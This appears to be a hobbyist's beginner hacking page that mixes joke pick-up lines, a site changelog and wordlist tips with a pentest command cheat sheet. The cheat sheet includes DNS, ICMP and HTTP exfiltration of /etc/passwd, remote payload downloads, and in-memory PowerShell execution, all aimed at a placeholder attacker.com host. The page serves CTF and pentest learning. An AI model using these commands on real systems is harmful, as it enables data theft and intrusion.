so you want to get started hacking??
well you're gonna want some equipment! (WANT, not NEED) For me i have it split into different categories! lets start with the basics:
physical pentesting tools
useful software
100% effective rizz lines to use TODAY
Are you a hidden file? Because I can feel you in my directory, even when I can't see you
You must be my SSH key, Because I trust you enough to let you in
Are you grep? Because you found exactly what I've been searching for
Girl, you're like a regex pattern—complex, beautiful, and I'd spend hours trying to figure you out
I always thought love was an abstract class, until you created an instance of it
Let's fork this process and spawn something beautiful together
you make me want to put my nic into promiscuous mode
Are you into programming? Because I find you extra cute able.
Things To add to the hacking e-bode
- host hacktricks, pentestnotes, gtfobins, revshells
- popups & scripts (is panko live, is panko online, twitch sub count, visitor count, status updates
- writeups on obscure shit
- writeups & uncommon commands
- selfhost tutorial
- study girl livestream page
- good hacking dashboard
- flesh out live2d & rigging section
- ham radio section
- tips and tricks
Sep 17 - started makin stuff
Sep 19 - moved index to prod - you can see this now!
Nov 08 - filled out hacking page with beginner guides!
Essential Wordlists 
Where to get wordlists:
SecLists: /usr/share/seclists/ (or github.com/danielmiessler/SecLists)
RockYou: /usr/share/wordlists/rockyou.txt
Dirbuster Lists: /usr/share/wordlists/dirbuster/
Most Used Lists:
- Directories: directory-list-2.3-medium.txt
- Subdomains: subdomains-top1million-5000.txt
- Passwords: rockyou.txt (14 million passwords!)
- Usernames: xato-net-10-million-usernames.txt
# Download SecLists git clone https://github.com/danielmiessler/SecLists.git # Extract rockyou sudo gunzip /usr/share/wordlists/rockyou.txt.gz # Create custom wordlist from website cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
Uncommon But Useful Commands 
File Transfers
# Python HTTP server python3 -m http.server 8000 # Download file on target wget http://attacker.com:8000/file curl http://attacker.com:8000/file -o file # Netcat file transfer # Receiver: nc -lvnp 4444 > file # Sender: nc target.com 4444 < file # Base64 transfer (when file transfer blocked) base64 file.txt # Copy output, then on target: echo "base64string" | base64 -d > file.txt
Port Forwarding
# SSH Local port forward ssh -L 8080:localhost:80 user@target.com # SSH Remote port forward ssh -R 4444:localhost:8080 user@attacker.com # SSH Dynamic port forward (SOCKS proxy) ssh -D 9050 user@target.com # Chisel (when SSH not available) # On attacker: ./chisel server -p 8000 --reverse # On target: ./chisel client attacker.com:8000 R:4444:localhost:80
Data Exfiltration
# DNS exfiltration cat /etc/passwd | xxd -p -c 31 | while read line; do dig $line.attacker.com; done # ICMP exfiltration cat file.txt | xxd -p -c 16 | while read line; do ping -c 1 -p $line attacker.com; done # HTTP POST exfiltration curl -X POST -d @/etc/passwd http://attacker.com/upload
Living Off The Land
# Download file with certutil (Windows)
certutil -urlcache -f http://attacker.com/file.exe file.exe
# Download with PowerShell
powershell -c "Invoke-WebRequest -Uri 'http://attacker.com/file' -OutFile 'file'"
# Execute in memory (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
# Compile and execute C# in memory
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:shell.exe shell.cs
Pro Tips 
Always Enumerate
When you get stuck, enumerate more! Check for:
- Hidden files and directories (.git, .svn, .env)
- Backup files (file.bak, file~, file.old)
- Version disclosures in headers/source
- User enumeration via timing attacks
Google is Your Friend
Found a service? Search for:
- "service name" exploit
- "service name" default credentials
- "service version" CVE
- Check ExploitDB and Searchsploit
Take Notes!
Use tools like:
- CherryTree for organized notes
- Obsidian for markdown notes
- Joplin for sync across devices
- Just a simple text file works too!
Screenshot Everything
For CTFs and pentest reports, you'll need proof!
# Take screenshot with scrot scrot screenshot.png # Use flameshot for annotations flameshot gui # Record terminal with asciinema asciinema rec session.cast
Practice Makes Perfect
- Do at least one box per week
- Read other people's writeups
- Try harder (but take breaks too!)
- Join the community on Discord/Reddit
- Help others - teaching helps you learn
Remember: The hacker mindset is about curiosity and persistence. Never give up!
Home